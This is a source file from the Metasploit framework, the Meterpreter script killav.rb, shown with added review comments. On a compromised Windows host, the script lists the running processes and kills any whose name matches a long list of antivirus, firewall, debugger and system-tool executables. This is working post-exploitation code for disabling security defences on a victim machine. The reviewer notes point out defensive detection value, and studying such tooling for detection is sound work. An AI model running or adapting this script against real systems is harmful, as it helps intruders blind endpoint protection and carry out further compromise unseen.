root / scripts / meterpreter / killav.rb @ 7396
| 1 | # $Id: killav.rb 7276 2009-10-26 15:14:28Z egypt $
|
|---|---|
| 2 | #
|
| 3 | # Meterpreter script that kills all Antivirus processes
|
| 4 | # Provided by: Jerome Athias <jerome.athias [at] free.fr>
|
| 5 | #
|
| 6 | |
# Command-line options accepted by this script: only "-h", which takes no
# argument (the leading false) and is described as the help menu.
@@exec_opts = Rex::Parser::Arguments.new("-h" => [false, "Help menu."])
# Print the option summary built from @@exec_opts, then end the script by
# raising Rex::Script::Completed.
def usage
  help_text = "Usage:" + @@exec_opts.usage
  print_line(help_text)
  raise Rex::Script::Completed
end
|
| 14 | |
# Walk the script arguments; "-h" is the only option handled, and usage
# raises, so nothing after this point runs when help is requested.
@@exec_opts.parse(args) do |opt, idx, val|
  usage if opt == "-h"
end

# Announce the action on the operator console before any process is touched.
print_status("Killing Antivirus services on the target...")
|
| 23 | |
# Process image names that the kill loop later in this script looks for.
# That loop compares each entry exactly against the lower-cased name of a
# running process.
#
# NOTE(review): the list is broader than antivirus products. It also names
# firewalls, debuggers and monitoring tools (ollydbg.exe, procdump.exe,
# ethereal.exe), stock Windows utilities (cmd.exe, regedit.exe, taskmgr.exe,
# netstat.exe, wininit.exe) and names that look like worm binaries
# (msblast.exe, beagle.exe) -- presumably inherited from an older kill list;
# confirm provenance. For defenders it doubles as a set of image names whose
# sudden termination is worth alerting on.
# avp.exe is listed twice.
avs = %W{
  AAWTray.exe
  Ad-Aware.exe
  MSASCui.exe
  _avp32.exe
  _avpcc.exe
  _avpm.exe
  aAvgApi.exe
  ackwin32.exe
  adaware.exe
  advxdwin.exe
  agentsvr.exe
  agentw.exe
  alertsvc.exe
  alevir.exe
  alogserv.exe
  amon9x.exe
  anti-trojan.exe
  antivirus.exe
  ants.exe
  apimonitor.exe
  aplica32.exe
  apvxdwin.exe
  arr.exe
  atcon.exe
  atguard.exe
  atro55en.exe
  atupdater.exe
  atwatch.exe
  au.exe
  aupdate.exe
  auto-protect.nav80try.exe
  autodown.exe
  autotrace.exe
  autoupdate.exe
  avconsol.exe
  ave32.exe
  avgcc32.exe
  avgctrl.exe
  avgemc.exe
  avgnt.exe
  avgrsx.exe
  avgserv.exe
  avgserv9.exe
  avguard.exe
  avgw.exe
  avkpop.exe
  avkserv.exe
  avkservice.exe
  avkwctl9.exe
  avltmain.exe
  avnt.exe
  avp.exe
  avp.exe
  avp32.exe
  avpcc.exe
  avpdos32.exe
  avpm.exe
  avptc32.exe
  avpupd.exe
  avsched32.exe
  avsynmgr.exe
  avwin.exe
  avwin95.exe
  avwinnt.exe
  avwupd.exe
  avwupd32.exe
  avwupsrv.exe
  avxmonitor9x.exe
  avxmonitornt.exe
  avxquar.exe
  backweb.exe
  bargains.exe
  bd_professional.exe
  beagle.exe
  belt.exe
  bidef.exe
  bidserver.exe
  bipcp.exe
  bipcpevalsetup.exe
  bisp.exe
  blackd.exe
  blackice.exe
  blink.exe
  blss.exe
  bootconf.exe
  bootwarn.exe
  borg2.exe
  bpc.exe
  brasil.exe
  bs120.exe
  bundle.exe
  bvt.exe
  ccapp.exe
  ccevtmgr.exe
  ccpxysvc.exe
  cdp.exe
  cfd.exe
  cfgwiz.exe
  cfiadmin.exe
  cfiaudit.exe
  cfinet.exe
  cfinet32.exe
  claw95.exe
  claw95cf.exe
  clean.exe
  cleaner.exe
  cleaner3.exe
  cleanpc.exe
  click.exe
  cmd.exe
  cmd32.exe
  cmesys.exe
  cmgrdian.exe
  cmon016.exe
  connectionmonitor.exe
  cpd.exe
  cpf9x206.exe
  cpfnt206.exe
  ctrl.exe
  cv.exe
  cwnb181.exe
  cwntdwmo.exe
  datemanager.exe
  dcomx.exe
  defalert.exe
  defscangui.exe
  defwatch.exe
  deputy.exe
  divx.exe
  dllcache.exe
  dllreg.exe
  doors.exe
  dpf.exe
  dpfsetup.exe
  dpps2.exe
  drwatson.exe
  drweb32.exe
  drwebupw.exe
  dssagent.exe
  dvp95.exe
  dvp95_0.exe
  ecengine.exe
  efpeadm.exe
  emsw.exe
  ent.exe
  esafe.exe
  escanhnt.exe
  escanv95.exe
  espwatch.exe
  ethereal.exe
  etrustcipe.exe
  evpn.exe
  exantivirus-cnet.exe
  exe.avxw.exe
  expert.exe
  explore.exe
  f-agnt95.exe
  f-prot.exe
  f-prot95.exe
  f-stopw.exe
  fameh32.exe
  fast.exe
  fch32.exe
  fih32.exe
  findviru.exe
  firewall.exe
  fnrb32.exe
  fp-win.exe
  fp-win_trial.exe
  fprot.exe
  frw.exe
  fsaa.exe
  fsav.exe
  fsav32.exe
  fsav530stbyb.exe
  fsav530wtbyb.exe
  fsav95.exe
  fsgk32.exe
  fsm32.exe
  fsma32.exe
  fsmb32.exe
  gator.exe
  gbmenu.exe
  gbpoll.exe
  generics.exe
  gmt.exe
  guard.exe
  guarddog.exe
  hacktracersetup.exe
  hbinst.exe
  hbsrv.exe
  hotactio.exe
  hotpatch.exe
  htlog.exe
  htpatch.exe
  hwpe.exe
  hxdl.exe
  hxiul.exe
  iamapp.exe
  iamserv.exe
  iamstats.exe
  ibmasn.exe
  ibmavsp.exe
  icload95.exe
  icloadnt.exe
  icmon.exe
  icsupp95.exe
  icsuppnt.exe
  idle.exe
  iedll.exe
  iedriver.exe
  iexplorer.exe
  iface.exe
  ifw2000.exe
  inetlnfo.exe
  infus.exe
  infwin.exe
  init.exe
  intdel.exe
  intren.exe
  iomon98.exe
  istsvc.exe
  jammer.exe
  jdbgmrg.exe
  jedi.exe
  kavlite40eng.exe
  kavpers40eng.exe
  kavpf.exe
  kazza.exe
  keenvalue.exe
  kerio-pf-213-en-win.exe
  kerio-wrl-421-en-win.exe
  kerio-wrp-421-en-win.exe
  kernel32.exe
  killprocesssetup161.exe
  launcher.exe
  ldnetmon.exe
  ldpro.exe
  ldpromenu.exe
  ldscan.exe
  lnetinfo.exe
  loader.exe
  localnet.exe
  lockdown.exe
  lockdown2000.exe
  lookout.exe
  lordpe.exe
  lsetup.exe
  luall.exe
  luau.exe
  lucomserver.exe
  luinit.exe
  luspt.exe
  mapisvc32.exe
  mcagent.exe
  mcmnhdlr.exe
  mcshield.exe
  mctool.exe
  mcupdate.exe
  mcvsrte.exe
  mcvsshld.exe
  md.exe
  mfin32.exe
  mfw2en.exe
  mfweng3.02d30.exe
  mgavrtcl.exe
  mgavrte.exe
  mghtml.exe
  mgui.exe
  minilog.exe
  mmod.exe
  monitor.exe
  moolive.exe
  mostat.exe
  mpfagent.exe
  mpfservice.exe
  mpftray.exe
  mrflux.exe
  msapp.exe
  msbb.exe
  msblast.exe
  mscache.exe
  msccn32.exe
  mscman.exe
  msconfig.exe
  msdm.exe
  msdos.exe
  msiexec16.exe
  msinfo32.exe
  mslaugh.exe
  msmgt.exe
  msmsgri32.exe
  mssmmc32.exe
  mssys.exe
  msvxd.exe
  mu0311ad.exe
  mwatch.exe
  n32scanw.exe
  nav.exe
  navap.navapsvc.exe
  navapsvc.exe
  navapw32.exe
  navdx.exe
  navlu32.exe
  navnt.exe
  navstub.exe
  navw32.exe
  navwnt.exe
  nc2000.exe
  ncinst4.exe
  ndd32.exe
  neomonitor.exe
  neowatchlog.exe
  netarmor.exe
  netd32.exe
  netinfo.exe
  netmon.exe
  netscanpro.exe
  netspyhunter-1.2.exe
  netstat.exe
  netutils.exe
  nisserv.exe
  nisum.exe
  nmain.exe
  nod32.exe
  normist.exe
  norton_internet_secu_3.0_407.exe
  notstart.exe
  npf40_tw_98_nt_me_2k.exe
  npfmessenger.exe
  nprotect.exe
  npscheck.exe
  npssvc.exe
  nsched32.exe
  nssys32.exe
  nstask32.exe
  nsupdate.exe
  nt.exe
  ntrtscan.exe
  ntvdm.exe
  ntxconfig.exe
  nui.exe
  nupgrade.exe
  nvarch16.exe
  nvc95.exe
  nvsvc32.exe
  nwinst4.exe
  nwservice.exe
  nwtool16.exe
  ollydbg.exe
  onsrvr.exe
  optimize.exe
  ostronet.exe
  otfix.exe
  outpost.exe
  outpostinstall.exe
  outpostproinstall.exe
  padmin.exe
  panixk.exe
  patch.exe
  pavcl.exe
  pavproxy.exe
  pavsched.exe
  pavw.exe
  pccwin98.exe
  pcfwallicon.exe
  pcip10117_0.exe
  pcscan.exe
  pdsetup.exe
  periscope.exe
  persfw.exe
  perswf.exe
  pf2.exe
  pfwadmin.exe
  pgmonitr.exe
  pingscan.exe
  platin.exe
  pop3trap.exe
  poproxy.exe
  popscan.exe
  portdetective.exe
  portmonitor.exe
  powerscan.exe
  ppinupdt.exe
  pptbc.exe
  ppvstop.exe
  prizesurfer.exe
  prmt.exe
  prmvr.exe
  procdump.exe
  processmonitor.exe
  procexplorerv1.0.exe
  programauditor.exe
  proport.exe
  protectx.exe
  pspf.exe
  purge.exe
  qconsole.exe
  qserver.exe
  rapapp.exe
  rav7.exe
  rav7win.exe
  rav8win32eng.exe
  ray.exe
  rb32.exe
  rcsync.exe
  realmon.exe
  reged.exe
  regedit.exe
  regedt32.exe
  rescue.exe
  rescue32.exe
  rrguard.exe
  rshell.exe
  rtvscan.exe
  rtvscn95.exe
  rulaunch.exe
  run32dll.exe
  rundll.exe
  rundll16.exe
  ruxdll32.exe
  safeweb.exe
  sahagent.exe
  save.exe
  savenow.exe
  sbserv.exe
  sc.exe
  scam32.exe
  scan32.exe
  scan95.exe
  scanpm.exe
  scrscan.exe
  serv95.exe
  setup_flowprotector_us.exe
  setupvameeval.exe
  sfc.exe
  sgssfw32.exe
  sh.exe
  shellspyinstall.exe
  shn.exe
  showbehind.exe
  smc.exe
  sms.exe
  smss32.exe
  soap.exe
  sofi.exe
  sperm.exe
  spf.exe
  sphinx.exe
  spoler.exe
  spoolcv.exe
  spoolsv32.exe
  spyxx.exe
  srexe.exe
  srng.exe
  ss3edit.exe
  ssg_4104.exe
  ssgrate.exe
  st2.exe
  start.exe
  stcloader.exe
  supftrl.exe
  support.exe
  supporter5.exe
  svc.exe
  svchostc.exe
  svchosts.exe
  svshost.exe
  sweep95.exe
  sweepnet.sweepsrv.sys.swnetsup.exe
  symproxysvc.exe
  symtray.exe
  sysedit.exe
  system.exe
  system32.exe
  sysupd.exe
  taskmg.exe
  taskmgr.exe
  taskmo.exe
  taskmon.exe
  taumon.exe
  tbscan.exe
  tc.exe
  tca.exe
  tcm.exe
  tds-3.exe
  tds2-98.exe
  tds2-nt.exe
  teekids.exe
  tfak.exe
  tfak5.exe
  tgbob.exe
  titanin.exe
  titaninxp.exe
  tracert.exe
  trickler.exe
  trjscan.exe
  trjsetup.exe
  trojantrap3.exe
  tsadbot.exe
  tvmd.exe
  tvtmd.exe
  undoboot.exe
  updat.exe
  update.exe
  upgrad.exe
  utpost.exe
  vbcmserv.exe
  vbcons.exe
  vbust.exe
  vbwin9x.exe
  vbwinntw.exe
  vcsetup.exe
  vet32.exe
  vet95.exe
  vettray.exe
  vfsetup.exe
  vir-help.exe
  virusmdpersonalfirewall.exe
  vnlan300.exe
  vnpc3000.exe
  vpc32.exe
  vpc42.exe
  vpfw30s.exe
  vptray.exe
  vscan40.exe
  vscenu6.02d30.exe
  vsched.exe
  vsecomr.exe
  vshwin32.exe
  vsisetup.exe
  vsmain.exe
  vsmon.exe
  vsstat.exe
  vswin9xe.exe
  vswinntse.exe
  vswinperse.exe
  w32dsm89.exe
  w9x.exe
  watchdog.exe
  webdav.exe
  webscanx.exe
  webtrap.exe
  wfindv32.exe
  whoswatchingme.exe
  wimmun32.exe
  win-bugsfix.exe
  win32.exe
  win32us.exe
  winactive.exe
  window.exe
  windows.exe
  wininetd.exe
  wininit.exe
  wininitx.exe
  winlogin.exe
  winmain.exe
  winnet.exe
  winppr32.exe
  winrecon.exe
  winservn.exe
  winssk32.exe
  winstart.exe
  winstart001.exe
  wintsk32.exe
  winupdate.exe
  wkufind.exe
  wnad.exe
  wnt.exe
  wradmin.exe
  wrctrl.exe
  wsbgate.exe
  wupdater.exe
  wupdt.exe
  wyvernworksfirewall.exe
  xpf202en.exe
  zapro.exe
  zapsetup3001.exe
  zatutor.exe
  zonalm2601.exe
  zonealarm.exe
}
|
| 607 | |
# Enumerate the processes reported by the session and terminate each one
# whose lower-cased image name appears verbatim in avs. Matching is by name
# only; no path, signer or service information is consulted.
# NOTE(review): no error handling is visible here, so what happens when a
# kill is refused depends on client.sys.process.kill. On the defensive side,
# a burst of terminations of security-product processes from one session is
# a high-signal tamper event to alert on.
client.sys.process.get_processes().each do |proc_info|
  image_name = proc_info['name']
  next unless avs.index(image_name.downcase)

  print_status("Killing off #{image_name}...")
  client.sys.process.kill(proc_info['pid'])
end
|